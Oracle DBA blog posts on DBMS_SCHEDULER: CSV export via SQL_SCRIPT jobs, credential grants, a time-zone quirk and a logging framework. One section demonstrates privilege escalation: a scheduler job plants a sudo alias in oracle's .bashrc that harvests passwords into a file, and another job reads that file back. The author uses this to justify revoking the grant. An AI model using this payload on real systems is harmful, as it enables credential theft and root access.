The Anti-Kyte
Generating a CSV file with a SQL_SCRIPT Scheduler Job
Data Warehouse developers don’t ask for much really…a batch window sufficient to run their overnight batch in;
incoming files that conform to their specification; the ability to generate CSV files from a DBMS_SCHEDULER job without writing code that looks like a herd of zebras in a blizzard…
select '"'||emp.first_name||'","'||emp.last_name||'","'||j.job_title||'","'||d.department_name...
These days, there are numerous ways to accomplish this in Oracle – SQLcl’s CSV formatting, for example, or rolling your own with UTL_FILE.
What I’m going to look at here is another option – using a SQL_SCRIPT scheduler job to take advantage of the formatting options available in SQL*Plus.
So, let’s leave those zebras in peace…
Environment and Setup
As with my previous post on this topic, I’m using a Virtualbox Oracle Developer Day Appliance running a 19c database on Oracle Linux 7.6.
We will be running the scheduler job as the HR user.
To recap, the setup is as follows :
On the Server OS
sudo useradd -M hr_etl
sudo passwd hr_etl
On the Database
A credential for the HR_ETL user on the Operating System, which is granted to the HR database user :
begin
dbms_credential.create_credential
(
credential_name => 'HR_ETL_OS_CREDENTIAL',
username => 'hr_etl',
password => 'Y3tanothercompl!catedpassword'
);
end;
/
grant execute on hr_etl_os_credential to hr;
A credential for the HR database user itself :
begin
dbms_credential.create_credential
(
credential_name => 'HR_DB_CREDENTIAL',
username => 'hr@orcl',
password => 'Mysupersecrethrpassw0rd!'
);
end;
/
grant execute on hr_db_credential to hr;
Privileges to execute external jobs for the HR user :
grant create job, create external job to hr;
This time, we’re going to need some directories to hold the report file we generate as well as a SQL script. These directories need to be accessible
to the OS user we’re connecting as to run the job ( HR_ETL).
In creating these directories, it seems prudent to ensure that HR_ETL ( and ultimately, any DB user with both access to the HR_ETL credential and the CREATE DIRECTORY privilege) does not have both write and execute access on any single directory.
Therefore, I’ll create the directories under the ownership of a different user and grant access to HR_ETL via the group.
In light of the shenanigans I got up to in the previous post, I’d suggest we don’t use oracle for this purpose. In this example, I’m using “mike”.
First, we’re going to create a group called ETL and assign hr_etl and mike to it :
sudo groupadd etl
sudo usermod -a -G etl hr_etl
sudo usermod -a -G etl mike
Next, we’ll create a directory structure to hold the relevant files :
mkdir /appdata
mkdir /appdata/output
mkdir /appdata/scripts
… and set etl to be the group…
sudo chgrp etl scripts
sudo chgrp etl output
Next, we’ll set the group permissions on the directories, including the setgid bit, so that any files created in them inherit the directory’s group and pick up the default permissions defined in the Access Control Lists that we’ll set up in a minute :
chmod g+s scripts
chmod g+s output
sudo chmod g+w output
chmod o-rwx output
chmod o-rwx scripts
The permissions on each directory now look like this :
drwxrws---. 1 mike etl 0 Dec 1 14:37 output
drwxr-s---+ 1 mike etl 48 Dec 1 12:02 scripts
So hr_etl has read and write permissions on OUTPUT and read permissions on scripts, thanks to its membership of the etl group.
Finally, we want to set up the Access Control Lists for the directories so that any files created in them will have the same permissions as those we’ve specified on the directory ( read/write in OUTPUT and read-only in SCRIPTS) :
setfacl -d -m g::r-- scripts
setfacl -d -m o::--- scripts
setfacl -d -m g::rw- output
setfacl -d -m o::--- output
To test :
touch /appdata/scripts/zebra.txt
ls -l /appdata/scripts/zebra.txt
-rw-r-----. 1 mike etl 0 Dec 1 14:55 /appdata/scripts/zebra.txt
touch /appdata/output/blizzard.txt
ls -l /appdata/output/blizzard.txt
-rw-rw-r--. 1 mike etl 0 Dec 1 14:55 /appdata/output/blizzard.txt
File Specification
The file needs to be in standard CSV format ( values enclosed in quotes and separated by commas).
Each record in the file requires a label to specify the type of record it is. The value will be one of :
- HEADER
- DATA
- TRAILER
The TRAILER record needs to be the last line in the file.
It needs to contain a timestamp for when the data was extracted and a count of the DATA rows in the file.
The filename needs to include the current date in it. The file format is :
employees_yyyymmdd.csv
The Report Query
We can fulfill a fair chunk of the file requirements in the report query itself.
To minimise the amount of code I need to add to the finished job, and so that the query and its output are within easy reach if (when) I need to do some investigation or debugging, I’ve decided to create the report query as a view.
The clouds overhead seem to have miraculously cleared…
create or replace view employees_report_vw
as
with rpt_data as
(
select
'DATA' as row_type,
emp.first_name,
emp.last_name,
to_char(emp.hire_date, 'YYYY-MM-DD') as hire_date,
j.job_title,
d.department_name,
count(*) over () as record_count -- total number of records returned - same value on every row
from employees emp
inner join jobs j
on emp.job_id = j.job_id
left outer join departments d
on emp.department_id = d.department_id
)
select
row_type as header, -- row type of the header row.
first_name,
last_name,
hire_date,
job_title,
department_name
from rpt_data
union
select
'TRAILER',
to_char(systimestamp, 'YYYYMMDDHH24MISS'),
to_char(any_value(record_count)),
null,
null,
null
from rpt_data
order by 1 -- ensure the trailer record is output last
/
Querying the view we get :
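The original screenshot isn’t reproduced here but, based on the CSV output further down, the result looks something like this :

HEADER     FIRST_NAME      LAST_NAME   HIRE_DATE   JOB_TITLE        DEPARTMENT_NAME
---------- --------------- ----------- ----------- ---------------- ---------------
DATA       Adam            Fripp       1997-04-10  Stock Manager    Shipping
DATA       Alana           Walsh       1998-04-24  Shipping Clerk   Shipping
...
TRAILER    20241201161121  107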
Dynamically generating the filename
To accomplish this, we’re going to use the SQL*Plus NEW_VALUE column formatting command :
clear screen
column fdate new_value v_date noprint
set verify off
select to_char(sysdate, 'YYYYMMDD') as fdate from dual;
select 'employees_&v_date..csv' from dual;
'EMPLOYEES_20241201.CS
----------------------
employees_20241201.csv
Other SQL*Plus settings
We want to specify that the output is in CSV format, with attributes double-quoted and separated with a comma :
set markup csv on delimiter , quote on
We also want to make sure that the spool off command doesn’t get echoed to the file and that the query result doesn’t clutter up the OUTPUT column in USER_SCHEDULER_JOB_RUN_DETAILS :
set echo off
set termout off
There’s a bit of a snag here as the echo and termout system variables are only effective when a script is being called. Therefore, I’m going to save the finished script to a file and copy it to the scripts directory on the server which we created earlier.
The finished article is called employees_report_job.sql and looks like this :
column fdate new_value v_date noprint
set verify off
select to_char( sysdate, 'YYYYMMDD') as fdate from dual;
set feedback off
set echo off
set termout off
set markup csv on delimiter , quote on
spool /appdata/output/employees_&v_date..csv
select * from employees_report_vw;
spool off
After all that, we can now set up and run the job from the comfort of the database…
set define off
declare
v_job_name varchar2(30) := 'EMPLOYEES_REPORT_JOB';
begin
dbms_scheduler.create_job
(
job_name => v_job_name,
job_type => 'SQL_SCRIPT',
job_action => '@/appdata/scripts/employees_report_job.sql',
credential_name => 'mike.hr_etl_os_credential',
enabled => false
);
dbms_scheduler.set_attribute
(
name => v_job_name,
attribute => 'connect_credential_name',
value => 'mike.hr_db_credential'
);
dbms_scheduler.enable(v_job_name);
end;
/
After running this we can check the job status :
select status, output
from user_scheduler_job_run_details
where job_name = 'EMPLOYEES_REPORT_JOB';
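All being well, the job should show a STATUS of SUCCEEDED, with the OUTPUT column holding the SQL*Plus session transcript ( illustrative output shown here) :

STATUS
------------------------------
SUCCEEDED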
If we now check on the server, we can see that the file has been created in the output directory…
ls -l /appdata/output/employees_20241201.csv
-rw-rw-rw-. 1 hr_etl etl 7226 Dec 1 16:11 /appdata/output/employees_20241201.csv
Checking the file itself …
head /appdata/output/employees_20241201.csv
"HEADER","FIRST_NAME","LAST_NAME","HIRE_DATE","JOB_TITLE","DEPARTMENT_NAME"
"DATA","Adam","Fripp","1997-04-10","Stock Manager","Shipping"
"DATA","Alana","Walsh","1998-04-24","Shipping Clerk","Shipping"
"DATA","Alberto","Errazuriz","1997-03-10","Sales Manager","Sales"
"DATA","Alexander","Hunold","1990-01-03","Programmer","IT"
"DATA","Alexander","Khoo","1995-05-18","Purchasing Clerk","Purchasing"
"DATA","Alexis","Bull","1997-02-20","Shipping Clerk","Shipping"
"DATA","Allan","McEwen","1996-08-01","Sales Representative","Sales"
"DATA","Alyssa","Hutton","1997-03-19","Sales Representative","Sales"
…and…
tail /appdata/output/employees_20241201.csv
"DATA","TJ","Olson","1999-04-10","Stock Clerk","Shipping"
"DATA","Tayler","Fox","1998-01-24","Sales Representative","Sales"
"DATA","Timothy","Gates","1998-07-11","Shipping Clerk","Shipping"
"DATA","Trenna","Rajs","1995-10-17","Stock Clerk","Shipping"
"DATA","Valli","Pataballa","1998-02-05","Programmer","IT"
"DATA","Vance","Jones","1999-03-17","Shipping Clerk","Shipping"
"DATA","William","Gietz","1994-06-07","Public Accountant","Accounting"
"DATA","William","Smith","1999-02-23","Sales Representative","Sales"
"DATA","Winston","Taylor","1998-01-24","Shipping Clerk","Shipping"
"TRAILER","20241201161121","107",,,
That should keep everyone happy, including the zebras.
Setting up a Credential for use in SQL_SCRIPT jobs without using the Oracle os user
In a recent post, Connor McDonald showed how to setup and use the SQL_SCRIPT scheduler job type to run SQL*Plus directly from the database.
Connor’s example enabled this functionality for a specific individual ( SCOTT) who already knew the Oracle OS account’s password and was therefore able to create a credential based on that user.
But what if we want to incorporate scheduler executed SQL*Plus scripts into an application, rather than just making it available to an individual ?
Tweaking Connor’s example, I’m going to attempt to :
- grant permissions on a credential to another user
- use the connect_credential_name job attribute to avoid hard-coding passwords
- explore the potential problem with using the oracle OS user as the object of a credential
- set up a Linux account to base the credential on instead
The environment I’m using is an Oracle Developer Day VM running Oracle Enterprise Edition 19c on Oracle Linux 7.6.
Granting privileges on DBMS_CREDENTIAL credentials
Yes, Credentials are database objects, and as such are grantable. So, as a user with the CREATE CREDENTIAL privilege …
begin
dbms_credential.create_credential
(
credential_name => 'ORACLE_OS_CREDENTIAL',
username => 'oracle',
password => 'ThisisownlyknowntotheDBAhon3st!'
);
end;
/
grant execute on oracle_os_credential to hr;
We can also use a credential to connect to the database whilst in a SQL_SCRIPT job.
In this case, we need to include the database connect string in the username :
begin
dbms_credential.create_credential
(
credential_name => 'HR_DB_CREDENTIAL',
username => 'hr@orcl',
password => 'Mysupersecrethrpassw0rd!'
);
end;
/
grant execute on hr_db_credential to hr;
If the application we’re dealing with involves lots of batch jobs and file wrangling, the application owner schema may already have the required privileges. If not, then we would need to grant them :
grant create job, create external job to hr;
If we now connect as HR, we can see the credentials…
select owner, credential_name, username, enabled
from all_credentials
/
OWNER CREDENTIAL_NAME USERNAME ENABLED
--------------- ------------------------------ --------------- -----------
MIKE ORACLE_OS_CREDENTIAL oracle TRUE
MIKE HR_DB_CREDENTIAL hr@orcl TRUE
…as well as the privileges…
select privilege
from user_sys_privs
where privilege like '%JOB%';
PRIVILEGE
----------------------------------------
CREATE EXTERNAL JOB
CREATE JOB
Now HR can run a job to test the setup…
declare
v_job_name varchar2(128) := 'HR_TEST_JOB1';
v_script varchar2(32767);
begin
-- SQL*Plus statements included, but no connect string
v_script := q'[
column os_user format a20
column db_user format a20
column db_name format a20
select
sys_context('userenv', 'os_user') as os_user,
sys_context('userenv', 'current_user') as db_user,
sys_context('userenv', 'db_name') as db_name
from dual;]';
-- Jobs are created as DISABLED by default, so it won't run immediately...
dbms_scheduler.create_job
(
job_name => v_job_name,
job_type => 'SQL_SCRIPT',
job_action => v_script,
credential_name => 'mike.oracle_os_credential'
);
-- ...so we have a chance to add a credential to use to connect to the database
dbms_scheduler.set_attribute
(
name => v_job_name,
attribute => 'connect_credential_name',
value => 'mike.hr_db_credential'
);
-- now run the job
dbms_scheduler.enable(v_job_name);
end;
/
After executing this job, we can see that the test was successful :
select output
from user_scheduler_job_run_details
where job_name = 'HR_TEST_JOB1'
/
OUTPUT
---------------------------------------------------------------
SQL*Plus: Release 19.0.0.0.0 - Production on Thu Nov 14 18:55:54 2024
Version 19.3.0.0.0
Copyright (c) 1982, 2019, Oracle. All rights reserved.
SQL> Connected.
SQL> SQL> SQL> SQL> SQL> 2 3 4 5
OS_USER DB_USER DB_NAME
-------------------- -------------------- --------------------
oracle HR ORCL
SQL> Disconnected from Oracle Database 19c Enterprise Edition Release 19.0.0.0.0 - Production
Version 19.3.0.0.0
However, there is something of a security issue with creating a credential on the oracle os user.
Would you like root with that ?
Whilst, in Connor’s example, the user created the credential themselves ( so presumably already knew the oracle OS user’s password), that’s not the case here.
That means that we’ve effectively just given HR passwordless access to the database as SYS.
To demonstrate :
declare
v_job_name varchar2(128) := 'HR_TEST_JOB2';
v_script varchar2(32767);
begin
-- No sys password ? No problem !
v_script := q'[
conn / as sysdba
column os_user format a20
column db_user format a20
column db_name format a20
select
sys_context('userenv', 'os_user') as os_user,
sys_context('userenv', 'current_user') as db_user,
sys_context('userenv', 'db_name') as db_name
from dual;]';
dbms_scheduler.create_job
(
job_name => v_job_name,
job_type => 'SQL_SCRIPT',
job_action => v_script,
credential_name => 'mike.oracle_os_credential'
);
-- now run the job
dbms_scheduler.enable(v_job_name);
end;
/
This time, we’ve hard-coded a connect string rather than using the database user credential. The result is a bit worrying…
OUTPUT
------------------------------------------------------------------------------
SQL*Plus: Release 19.0.0.0.0 - Production on Thu Nov 14 19:15:43 2024
Version 19.3.0.0.0
Copyright (c) 1982, 2019, Oracle. All rights reserved.
SQL> SQL> Connected.
SQL> SQL> SQL> SQL> 2 3 4 5
OS_USER DB_USER DB_NAME
-------------------- -------------------- --------------------
oracle SYS orclcdb
SQL> Disconnected from Oracle Database 19c Enterprise Edition Release 19.0.0.0.0 - Production
Version 19.3.0.0.0
Because the OS connection is as oracle, we can use the “/ as sysdba” connect string to connect as SYS.
It’s also worth bearing in mind that the credential can be used for jobs other than SQL_SCRIPT…
declare
v_job_name varchar2(30) := 'HR_EXTERNAL';
v_script varchar2(32767);
begin
v_script := 'whoami';
dbms_scheduler.create_job
(
job_name => v_job_name,
job_type => 'EXTERNAL_SCRIPT',
job_action => v_script,
credential_name => 'mike.oracle_os_credential',
enabled => TRUE
);
end;
/
select output
from user_scheduler_job_run_details
where job_name = 'HR_EXTERNAL'
/
OUTPUT
------------------------------
oracle
On this Oracle Linux server, oracle is on the sudoers list, which means HR can do something like this…
set define off
declare
v_job_name varchar2(30) := 'MWAHAHAHA';
v_script varchar2(32767);
begin
v_script := q'[/usr/bin/echo "alias sudo='echo -n \"[sudo] password for \$USER: \" && read -s -r password && echo -e \"\\n\" && echo \"\$USER:\$password\" >>/u01/userhome/oracle/stohelit.txt; echo \$password | $(which sudo) -S \$@'" >> /u01/userhome/oracle/.bashrc]';
dbms_scheduler.create_job
(
job_name => v_job_name,
job_type => 'EXTERNAL_SCRIPT',
job_action => v_script,
credential_name => 'mike.oracle_os_credential',
enabled => TRUE
);
end;
/
…which adds an alias for sudo to the oracle user’s .bashrc…
cat .bashrc
alias sudo='echo -n "[sudo] password for $USER: " && read -s -r password && echo -e "\n" && echo "$USER:$password" >>/u01/userhome/oracle/stohelit.txt; echo $password | /usr/bin/sudo -S $@'
This executes the next time anyone runs a sudo command whilst connected as oracle…
[oracle@localhost oracle]$ sudo ls -l
[sudo] password for oracle:
Meaning that the oracle OS password is saved into a file called stohelit.txt and can be retrieved by running something like :
declare
v_job_name varchar2(30) := 'UNLIMITED_POWER';
v_script varchar2(32767);
begin
v_script := 'ho /usr/bin/cat /u01/userhome/oracle/stohelit.txt';
dbms_scheduler.create_job
(
job_name => v_job_name,
job_type => 'SQL_SCRIPT',
job_action => v_script,
credential_name => 'mike.oracle_os_credential',
enabled => TRUE
);
end;
/
select output
from user_scheduler_job_run_details
where job_name = 'UNLIMITED_POWER'
/
With the password, it’s now possible to run commands as root ( using sudo).
Clearly, a rethink is required…
revoke execute on oracle_os_credential from hr;
Creating an OS user for SQL_SCRIPT jobs
What we need is an OS user who isn’t oracle. But what else do we need to do to make an account suitable for running SQL_SCRIPT jobs ?
It turns out that the minimum requirement is simply a password.
If the application already has an OS user associated with it, then you can use that.
If not then we need to create one.
Remember, in my case, I’m on Oracle Linux so it’s just a matter of…
sudo useradd -m hr_etl
sudo passwd hr_etl
…and that’s it.
The new account doesn’t even need to have the SQL*Plus executable in its $PATH…
[hr_etl@localhost ~]$ sqlplus /nolog
bash: sqlplus: command not found...
To demonstrate, we’ll connect to the database as the user with the CREATE CREDENTIAL privilege and …
begin
dbms_credential.create_credential
(
credential_name => 'HR_ETL_OS_CREDENTIAL',
username => 'hr_etl',
password => 'Y3tanothercompl!catedpassword'
);
end;
/
grant execute on hr_etl_os_credential to hr;
Now, connected to the database as HR, we can use the new credential :
declare
v_job_name varchar2(128) := 'HR_TEST_JOB3';
v_script varchar2(32767);
begin
-- SQL*Plus statements included, but no connect string
v_script := q'[
column os_user format a20
column db_user format a20
column db_name format a20
select
sys_context('userenv', 'os_user') as os_user,
sys_context('userenv', 'current_user') as db_user,
sys_context('userenv', 'db_name') as db_name
from dual;]';
-- Using the new credential...
dbms_scheduler.create_job
(
job_name => v_job_name,
job_type => 'SQL_SCRIPT',
job_action => v_script,
credential_name => 'mike.hr_etl_os_credential'
);
dbms_scheduler.set_attribute
(
name => v_job_name,
attribute => 'connect_credential_name',
value => 'mike.hr_db_credential'
);
dbms_scheduler.enable(v_job_name);
end;
/
Better still, if we now try to login as SYS using the “/ as sysdba” syntax…
declare
v_job_name varchar2(128) := 'HR_TEST_JOB4';
v_script varchar2(32767);
begin
v_script := q'[
conn / as sysdba
column os_user format a20
column db_user format a20
column db_name format a20
select
sys_context('userenv', 'os_user') as os_user,
sys_context('userenv', 'current_user') as db_user,
sys_context('userenv', 'db_name') as db_name
from dual;]';
dbms_scheduler.create_job
(
job_name => v_job_name,
job_type => 'SQL_SCRIPT',
job_action => v_script,
credential_name => 'mike.hr_etl_os_credential'
);
dbms_scheduler.enable(v_job_name);
end;
/
…Oracle is having none of it…
select output
from user_scheduler_job_run_details
where job_name = 'HR_TEST_JOB4'
/
SQL*Plus: Release 19.0.0.0.0 - Production on Thu Nov 14 20:09:43 2024
Version 19.3.0.0.0
Copyright (c) 1982, 2019, Oracle. All rights reserved.
SQL> SQL> ERROR:
ORA-01017: invalid username/password; logon denied
SQL> SQL> SQL> SQL> 2 3 4 5 SP2-0640: Not connected
SQL>
In an application such as this, you’ll probably want to use SQL_SCRIPT to read and write files on the operating system, in which case further configuration will be needed in terms of OS file permissions etc. As far as running the jobs is concerned though, you should be good to go.
Acknowledgements
The sudo credential exploit above is based on a rather more elegant example in the SUDO_KILLER GitHub Repo.
Oracle DBMS_SCHEDULER – Getting in a tangle with Time Zones
DBMS_SCHEDULER’s slightly arcane but extremely flexible calendaring syntax allows myriad ways to determine when a batch job should run.
However, there is a limitation when it comes to specifying which time zone should be used by the scheduler.
The documentation says :
The calendaring syntax does not allow you to specify a time zone. Instead the Scheduler retrieves the time zone from the start_date argument. If jobs must follow daylight savings adjustments, then you must specify a region name for the time zone of the start_date. For example specifying the start_date time zone as ‘US/Eastern’ in New York ensures that daylight saving adjustments are automatically applied. If instead, the time zone of the start_date is set to an absolute offset, such as ‘-5:00’, then daylight savings adjustments are not followed and your job execution is off by an hour for half the year.
It goes on to explain that, when the start_date is null, the time zone is determined by ( in descending order of precedence) :
- the time zone set in the current session (if it’s a Region Name)
- the DEFAULT_TIMEZONE scheduler attribute
- the time zone of the SYSTIMESTAMP when the Job (or Window) is enabled
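Incidentally, if you want to check or change the second item in that list, the DEFAULT_TIMEZONE scheduler attribute can be queried and set. A quick sketch ( run as a suitably privileged user; the region shown is just an example) :

select value
from dba_scheduler_global_attribute
where attribute_name = 'DEFAULT_TIMEZONE';

begin
    dbms_scheduler.set_scheduler_attribute
    (
        attribute => 'default_timezone',
        value => 'Europe/London'
    );
end;
/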
Unfortunately, when setting a start_date for a job from inside another scheduler job, things do not work as expected.
If we were on a new-fangled AI enabled version of Oracle, I’d suspect that DIANA has taken a dislike to me ( maybe it doesn’t like the way I format my code, or something).
However, as I’ve experienced this behaviour on the less judgemental 19c ( and earlier), further digging is probably required…
Let’s begin by confirming that everything works as it should when we setup a job interactively.
To start with, we’ll create a simple scheduler job :
begin
dbms_scheduler.create_job
(
job_name => 'SIMPLE_JOB',
job_type => 'PLSQL_BLOCK',
job_action => 'begin null; end;'
);
end;
/
We can see at this point that the job has no start_date :
select enabled, state, start_date
from user_scheduler_jobs
where job_name = 'SIMPLE_JOB'
/
ENABL STATE START_DATE
----- --------- -----------
FALSE DISABLED
Let’s check what the current session time zone is set to :
select sessiontimezone from dual;
SESSIONTIMEZONE
------------------------------
Europe/London
So, if we now set the job start_date…
exec dbms_scheduler.set_attribute('simple_job', 'start_date', to_date('2024-10-22 08:00', 'YYYY-MM-DD HH24:MI'));
exec dbms_scheduler.enable('simple_job');
… the scheduler should use the Session Time Zone :
select enabled, state, start_date
from user_scheduler_jobs
where job_name = 'SIMPLE_JOB'
/
ENABL STATE START_DATE
----- ---------- ------------------------------------------
TRUE SCHEDULED 22-OCT-24 08.00.00.000000000 EUROPE/LONDON
No issues there, let’s see what happens when we…
Set the Start Date from another Scheduler Job
Let’s start with a clean slate and drop and re-create the job :
exec dbms_scheduler.drop_job('simple_job');
begin
dbms_scheduler.create_job
(
job_name => 'SIMPLE_JOB',
job_type => 'PLSQL_BLOCK',
job_action => 'begin null; end;'
);
end;
/
This time, we’re going to set the start_date for SIMPLE_JOB from another scheduler job :
declare
v_action varchar2(4000) :=
q'[
begin
dbms_scheduler.set_attribute('simple_job', 'start_date', to_date('2024-11-22 08:00', 'YYYY-MM-DD HH24:MI'));
dbms_scheduler.enable('simple_job');
end;]';
begin
dbms_scheduler.create_job
(
job_name => 'enable_job',
job_type => 'plsql_block',
job_action => v_action
);
end;
/
Now when we run ENABLE_JOB…
exec dbms_scheduler.run_job('enable_job');
…we can see that the scheduler has ignored the time zone altogether and instead applied an offset to UTC :
select enabled, state, start_date
from user_scheduler_jobs
where job_name = 'SIMPLE_JOB'
/
ENABL STATE START_DATE
----- -------------------- -----------------------------------
TRUE SCHEDULED 22-NOV-24 08.00.00.000000000 +01:00
Furthermore, the offset specified in the START_DATE value does not match the offset for the Europe/London region for that date:
select extract( timezone_hour from timestamp '2024-11-22 08:00:00.00 Europe/London')
as offset_to_utc
from dual;
OFFSET_TO_UTC
-------------
0
Consequently the job will start an hour later than specified.
The Fix
If you were paying attention, you’ll know that the fix is RTFM !
Yes, that quote from the documentation above is explicit :
If jobs must follow daylight savings adjustments, then you must specify a region name for the time zone of the start_date.
In other words…
exec dbms_scheduler.drop_job('enable_job');
declare
v_action varchar2(4000) :=
q'[
begin
dbms_scheduler.set_attribute
(
name => 'simple_job',
attribute => 'start_date',
value => to_timestamp_tz('2024-11-22 08:00 Europe/London', 'YYYY-MM-DD HH24:MI TZR')
);
dbms_scheduler.enable('simple_job');
end;]';
begin
dbms_scheduler.create_job
(
job_name => 'enable_job',
job_type => 'plsql_block',
job_action => v_action
);
end;
/
Now, when we run the start_date set job…
exec dbms_scheduler.run_job('enable_job');
…the Region we’ve specified is used …
select enabled, state, start_date
from user_scheduler_jobs
where job_name = 'SIMPLE_JOB'
/
ENABL STATE START_DATE
----- -------------------- ------------------------------------------
TRUE SCHEDULED 22-NOV-24 08.00.00.000000000 EUROPE/LONDON
Why does this happen ?
For the moment, I’m going to assume that this is not caused by my reluctance to use commas at the start of the line in a select clause.
I’ve knocked up a procedure which records the relevant time zone settings and saves them to a log table. For this purpose, I’m using the Skippy framework, which writes to the SKIPPY_LOGS table.
NOTE – you will need to have SELECT on DBA_SCHEDULER_GLOBAL_ATTRIBUTE granted directly to the procedure owner for this to compile :
create or replace procedure log_tz_settings
as
cursor c_tz_settings is
select
sessiontimezone as session_tz,
value as default_timezone,
to_char(to_timestamp_tz( systimestamp), 'TZR') as systimestamp_tz
from dba_scheduler_global_attribute
where attribute_name = 'DEFAULT_TIMEZONE';
v_settings c_tz_settings%rowtype;
v_set_list varchar2(4000);
begin
open c_tz_settings;
fetch c_tz_settings into v_settings;
close c_tz_settings;
skippy.add_param('SESSION_TZ', v_settings.session_tz, v_set_list);
skippy.add_param('DEFAULT_TIMEZONE', v_settings.default_timezone, v_set_list);
skippy.add_param('SYSTIMESTAMP_TZ', v_settings.systimestamp_tz, v_set_list);
skippy.log(v_set_list);
end;
/
When we execute this procedure in an interactive session, we can see that the values are as expected :
clear screen
set serverout on
exec skippy.enable_output;
exec log_tz_settings;
PL/SQL procedure successfully completed.
SESSION_TZ => Europe/London, DEFAULT_TIMEZONE => PST8PDT, SYSTIMESTAMP_TZ => +01:00
However, if we now add a call to this procedure in the ENABLE_JOB :
exec dbms_scheduler.drop_job('enable_job');
declare
v_action varchar2(4000) :=
q'[
begin
skippy.set_msg_group('CHECK_TZ_SETTINGS');
log_tz_settings;
dbms_scheduler.set_attribute
(
name => 'simple_job',
attribute => 'start_date',
value => to_date('2024-11-22 08:00', 'YYYY-MM-DD HH24:MI')
);
dbms_scheduler.enable('simple_job');
end;]';
begin
dbms_scheduler.create_job
(
job_name => 'enable_job',
job_type => 'plsql_block',
job_action => v_action
);
end;
/
…and run it again…
exec dbms_scheduler.run_job('enable_job');
select enabled, state, start_date
from user_scheduler_jobs
where job_name = 'SIMPLE_JOB'
/
ENABL STATE START_DATE
----- -------------------- -----------------------------------
TRUE SCHEDULED 22-NOV-24 08.00.00.000000000 +01:00
When we check the log, we can see that the SESSIONTIMEZONE value is not what we expected :
select message
from skippy_logs
where message_group = 'CHECK_TZ_SETTINGS'
/
MESSAGE
---------------------------------------------------------------
SESSION_TZ => +01:00, DEFAULT_TIMEZONE => PST8PDT, SYSTIMESTAMP_TZ => +01:00
Incidentally, the Scheduler Default Timezone (PST8PDT) currently has an offset of -7 hours to UTC.
Therefore, we can infer that it’s the SESSIONTIMEZONE value of the session in which the Scheduler Job runs that is being used, even though it’s an absolute offset rather than a region name.
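Another possible workaround, which I haven’t tested here but which follows from the precedence rules quoted earlier, would be to explicitly set the session time zone to a region name inside the enabling job before calling SET_ATTRIBUTE. The job_action of ENABLE_JOB would then contain something like :

begin
    -- make sure the job session's time zone is a region name rather than an offset
    -- before the DATE start_date gets converted to a TIMESTAMP WITH TIME ZONE
    execute immediate 'alter session set time_zone = ''Europe/London''';
    dbms_scheduler.set_attribute('simple_job', 'start_date', to_date('2024-11-22 08:00', 'YYYY-MM-DD HH24:MI'));
    dbms_scheduler.enable('simple_job');
end;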
Assorted Time Zone Information
Oracle provides a list of valid Region Names in the form of V$TIMEZONE_NAMES. For example …
select tzname, tzabbrev
from v$timezone_names
where tzname = 'UTC'
/
TZNAME TZABBREV
-------------------------------------------------- ----------
UTC GMT
If we look at the currently defined Region in my session, we can see multiple TZABBREV values that appear to represent daylight savings changes …
select tzname, tzabbrev
from v$timezone_names
where tzname = sessiontimezone
/
TZNAME TZABBREV
-------------------------------------------------- ----------
Europe/London LMT
Europe/London GMT
Europe/London BST
Europe/London BDST
Using the built-in TZ_OFFSET function, we can establish the current UTC offset for a Region…
select tz_offset('Europe/London') from dual;
TZ_OFFS
-------
+01:00
To see which particular abbreviation this offset relates to :
select to_char(current_timestamp, 'TZD') from dual;
TO_CHA
------
BST
If we want to know which particular Timezone abbreviation will apply for any given month in the year, and when they will change, we may need to write something a bit fiddly like :
select
to_char( to_date( rownum, 'MM'), 'Month') as "Month",
-- Using 10:08 as the time because that's what you see in all the watch/clock adverts. Phones too.
-- This time was apparently chosen because, on an Analog clockface the hands are forming a "smile".
to_char
(
to_timestamp_tz
(
extract( year from sysdate)||'-'||
to_char( lpad( rownum, 2, '0'))||'-'||
'01 10:08:00 Europe/London', 'YYYY-MM-DD HH24:MI:SS TZR'
),
'TZD'
) as "Start of Month TZ Abbreviation",
to_char
(
to_timestamp_tz
(
extract( year from sysdate)||'-'||
to_char( lpad( rownum, 2, '0'))||'-'||
to_char( last_day( to_date( rownum, 'MM')), 'DD')||
' 10:08:00 Europe/London', 'YYYY-MM-DD HH24:MI:SS TZR'
),
'TZD'
) as "End of Month TZ Abbreviation"
from dual
connect by rownum <= 12;
What’s that ? You think DIANA may have a point about my code formatting ? Honestly, everyone’s a critic ! Anyhow, the output looks like this :
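The output image isn’t reproduced here but, for Europe/London in 2024 ( where the clocks change on the last Sunday in March and the last Sunday in October), you’d expect something like :

Month     Start of Month TZ Abbreviation  End of Month TZ Abbreviation
--------- ------------------------------  ----------------------------
January   GMT                             GMT
February  GMT                             GMT
March     GMT                             BST
April     BST                             BST
May       BST                             BST
June      BST                             BST
July      BST                             BST
August    BST                             BST
September BST                             BST
October   BST                             GMT
November  GMT                             GMT
December  GMT                             GMT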
Other Useful Link
I bet Tim Hall never has this trouble. Also, his Oracle Base article on setting Time Zones is typically thorough.
Skippy – Displaying log messages using DBMS_OUTPUT
I’ve added a feature to the Skippy framework which makes it possible to see log messages in an interactive session, as well as in the log table.
You can find Skippy on GitHub.
Now, Skippy isn’t really into cricket – Rugby League is more of a Kangaroo sport – but I am, which may go some way to explaining the examples that follow.
England’s continuing Bazball adventure has met with contrasting fortunes over the last week or so.
In this first example, we can see the sort of logging that you might find in long-running scheduler batch jobs :
begin
skippy.set_msg_group('FIRST_TEST');
skippy.log('Day 1 : Pakistan 328/4');
skippy.log('Day 2 : Pakistan 556 all out, England 96/1');
skippy.log('Day 3 : England 492/3');
skippy.log('Day 4 : England 823/7 dec, Pakistan 152/6');
skippy.log('Day 5 : Pakistan 220 all out');
skippy.log('Result : England win by an innings and 47 runs');
end;
/
After running this, we have to hunt around in the SKIPPY_LOG table to find the log messages :
select log_ts, message
from skippy_logs
where message_group = 'FIRST_TEST'
order by log_ts;
If we want to execute code in an interactive session, we can now read the log messages in the session itself.
To do this :
- enable SERVEROUTPUT in your interactive session so you can see the messages
- call the new SKIPPY.ENABLE_OUTPUT procedure.
- call SKIPPY.DISABLE_OUTPUT to toggle this feature off.
For example…
set serverout on
begin
skippy.set_msg_group('SECOND_TEST');
skippy.enable_output;
skippy.log('Day 1 : Pakistan 259/5');
skippy.log('Day 2 : Pakistan 366, England 239/6');
skippy.log('Day 3 : England 291, Pakistan 221, England 36/2');
skippy.log('Day 4 : ERROR - England batting failed 144 all out');
skippy.log('Result : Pakistan win by 152 runs');
-- optionally turn output off
skippy.disable_output;
end;
/
As well as outputting to the screen, SKIPPY still writes the log messages to the table.
What’s that Skippy ? SYS_CONTEXT USERENV Parameters in the database don’t match the docs ?
The USERENV namespace lurks in one of the darker corners of your Oracle Database.
